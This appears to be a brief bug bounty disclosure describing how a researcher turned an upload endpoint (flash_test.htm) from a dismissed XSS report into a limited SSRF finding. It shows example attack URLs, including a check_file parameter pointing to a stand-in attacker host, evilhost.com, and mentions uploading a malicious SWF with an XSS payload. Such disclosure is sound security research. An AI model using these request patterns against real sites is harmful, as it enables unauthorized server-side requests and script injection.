SSRF in the project outside of bug bounty program's scope.
Despite the project is out-of-scope, bounty was rewarded due to problem severity.
i reported this issue as xss one year ago,
so i found a directory, where one can upload
/flash_test.htm?show=upload swf files,
i uploaded malicious swf file with xss payload. swf file was uploading in 3rd party domain so was executing there.
flash_test.htm?check_file=xss.swf|https://sandboxdomain.com/img/7D/E83D61.swf but its was executing in 3rd party domain so team closed my report as N/A .
that time i forgot to check more , 3 months ago i decided to investigate more and found SSRF here.
flash_test.htm?check_file=xss.swf|http://evilhost.com/ssrf and response received into my console. it was limited ssrf.